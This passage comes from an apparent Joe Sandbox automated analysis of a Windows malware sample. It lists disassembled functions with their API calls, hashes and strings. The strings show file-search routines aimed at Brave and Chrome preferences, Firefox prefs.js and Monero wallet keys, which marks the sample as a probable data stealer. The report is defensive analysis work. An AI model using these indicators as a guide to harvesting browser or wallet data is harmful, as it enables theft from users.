                                    • StrCmpCA.SHLWAPI(?,009613F8), ref: 0094BF4D
                                    • StrCmpCA.SHLWAPI(?,009613FC), ref: 0094BF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094C7BF
                                    • FindClose.KERNEL32(000000FF), ref: 0094C7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: 4adf6ab1b3489449ec5b23af3367d0e1020367a8ecf82b747b5978ab6cb5f2dc
                                    • Instruction ID: e29df1646b12cca12862d82cb60539ea707b2c6815dafc168576c2ce6dcb3ca7
                                    • Opcode Fuzzy Hash: 4adf6ab1b3489449ec5b23af3367d0e1020367a8ecf82b747b5978ab6cb5f2dc
                                    • Instruction Fuzzy Hash: 93425172910108ABDB14FB71DD96FEE733DABC4301F404658B90A97191EE34AB4DCBA6
                                    Function 00954910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0095492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00954943
                                    • StrCmpCA.SHLWAPI(?,00960FDC), ref: 00954971
                                    • StrCmpCA.SHLWAPI(?,00960FE0), ref: 00954987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00954B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00954B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: cc01f47adfeae0e561a076197025dee4861dfa7aa15a3afe981e05178a3b0057
                                    • Instruction ID: b560c40e47bb3b67548f99c5ec7470e6c8cdc0e8d30e36763a1926595af888f1
                                    • Opcode Fuzzy Hash: cc01f47adfeae0e561a076197025dee4861dfa7aa15a3afe981e05178a3b0057
                                    • Instruction Fuzzy Hash: B76168B1900218ABDB24EBA0DC85FEA737CBB88705F044589F50997151EF75EB89CFA1
                                    Function 00954570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00954580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00954587
                                    • wsprintfA.USER32 ref: 009545A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 009545BD
                                    • StrCmpCA.SHLWAPI(?,00960FC4), ref: 009545EB
                                    • StrCmpCA.SHLWAPI(?,00960FC8), ref: 00954601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095468B
                                    • FindClose.KERNEL32(000000FF), ref: 009546A0
                                    • lstrcat.KERNEL32(?,015EE4B0), ref: 009546C5
                                    • lstrcat.KERNEL32(?,015ED358), ref: 009546D8
                                    • lstrlen.KERNEL32(?), ref: 009546E5
                                    • lstrlen.KERNEL32(?), ref: 009546F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 66bdf72f281c5f8d320cc8ea33913466f2ad403f03cb4372be4015634de897b0
                                    • Instruction ID: 424838a11257280e750e828a03a734a58e6b83aac40d8855d576adb641181591
                                    • Opcode Fuzzy Hash: 66bdf72f281c5f8d320cc8ea33913466f2ad403f03cb4372be4015634de897b0
                                    • Instruction Fuzzy Hash: 6E5156B59102189BD764EB70DC89FEE777CAB98301F404589F60997190EF749B88CFA2
                                    Function 00953EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00953EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00953EDA
                                    • StrCmpCA.SHLWAPI(?,00960FAC), ref: 00953F08
                                    • StrCmpCA.SHLWAPI(?,00960FB0), ref: 00953F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095406C
                                    • FindClose.KERNEL32(000000FF), ref: 00954081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 1d12097aa009e8a2bbac552f5401214436a0b62962d318ad97411490aa443663
                                    • Instruction ID: 50e73c756419f231008292ff90fe322d660ec79ef62e4d56aa8c5db84a6ddb25
                                    • Opcode Fuzzy Hash: 1d12097aa009e8a2bbac552f5401214436a0b62962d318ad97411490aa443663
                                    • Instruction Fuzzy Hash: 3C5177B2900218ABDB24EBB1DC85FEA737CBB84301F404589B65997050EF75EB89CF65
                                    Function 0094ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0094ED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0094ED55
                                    • StrCmpCA.SHLWAPI(?,00961538), ref: 0094EDAB
                                    • StrCmpCA.SHLWAPI(?,0096153C), ref: 0094EDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094F2AE
                                    • FindClose.KERNEL32(000000FF), ref: 0094F2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 661ec9e7353b5c62a3ab9827b5e8b29c2131b17a737cd5f528fd65371da6738d
                                    • Instruction ID: 4178f6ea53ee1c8304de3ca12325d7e761a9f7967c2e0efddd0b4dfd87ab8f3a
                                    • Opcode Fuzzy Hash: 661ec9e7353b5c62a3ab9827b5e8b29c2131b17a737cd5f528fd65371da6738d
                                    • Instruction Fuzzy Hash: C2E1A1719111189AEB55FB61DC52FEE733CAF94301F404699B90A62092EF306F8ECF5A
                                    Function 0094F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009615B8,00960D96), ref: 0094F71E
                                    • StrCmpCA.SHLWAPI(?,009615BC), ref: 0094F76F
                                    • StrCmpCA.SHLWAPI(?,009615C0), ref: 0094F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 0094FAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: 44dafb1aea01e8a3d2db1b915a39d922a5d5e1975bdeffe6c7e9ef3eb6b54826
                                    • Instruction ID: 3ffa5c583490f35c50e3f43b20c106b8645d53a21596b43ff0a52e7daf945440
                                    • Opcode Fuzzy Hash: 44dafb1aea01e8a3d2db1b915a39d922a5d5e1975bdeffe6c7e9ef3eb6b54826
                                    • Instruction Fuzzy Hash: 19B141719001189BDB24FF61DC96FEE7379AFD4301F4086A8A90A97191EF306B4DCB96
                                    Function 009416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0096510C,?,?,?,009651B4,?,?,00000000,?,00000000), ref: 00941923
                                    • StrCmpCA.SHLWAPI(?,0096525C), ref: 00941973
                                    • StrCmpCA.SHLWAPI(?,00965304), ref: 00941989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00941D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00941DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00941E20
                                    • FindClose.KERNEL32(000000FF), ref: 00941E32
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 438337edb5ac2bdefaa88838f9bdcfe7171c7d7d87ef6cfd1db66259be9df17b
                                    • Instruction ID: 9befa3506e7a7ddbdb6ec1584d322d082e7c2342ab96ed2c602de96f6830b7aa
                                    • Opcode Fuzzy Hash: 438337edb5ac2bdefaa88838f9bdcfe7171c7d7d87ef6cfd1db66259be9df17b
                                    • Instruction Fuzzy Hash: DE12EF719101189BDB19FB61DCA6FEE7378AF94301F404699B90A62091EF306F8DCF99
                                    Function 0094DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00960C2E), ref: 0094DE5E
                                    • StrCmpCA.SHLWAPI(?,009614C8), ref: 0094DEAE
                                    • StrCmpCA.SHLWAPI(?,009614CC), ref: 0094DEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094E3E0
                                    • FindClose.KERNEL32(000000FF), ref: 0094E3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: bbc728ba2c43ca2116e27a0d8ef581f8800f01ad2b3c8727eb658974c5773e3f
                                    • Instruction ID: 9fe97d05b259bdbfeca09ed3b026e449497689c09b9c8830d53663dc62f60cc0
                                    • Opcode Fuzzy Hash: bbc728ba2c43ca2116e27a0d8ef581f8800f01ad2b3c8727eb658974c5773e3f
                                    • Instruction Fuzzy Hash: 34F19E719141189ADB15EB61DC95FEE7338BF94301F8042D9B91A620A1EF306F8ECF69
                                    Function 0094DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009614B0,00960C2A), ref: 0094DAEB
                                    • StrCmpCA.SHLWAPI(?,009614B4), ref: 0094DB33
                                    • StrCmpCA.SHLWAPI(?,009614B8), ref: 0094DB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094DDCC
                                    • FindClose.KERNEL32(000000FF), ref: 0094DDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 74687fc993a11c46050a0863a01bd499288995caa78449e5b7f3e8e54796b2c1
                                    • Instruction ID: 0d3580489f3e05fc4de8f069461bc108402ca93c57401f73f2f4b35981aff965
                                    • Opcode Fuzzy Hash: 74687fc993a11c46050a0863a01bd499288995caa78449e5b7f3e8e54796b2c1
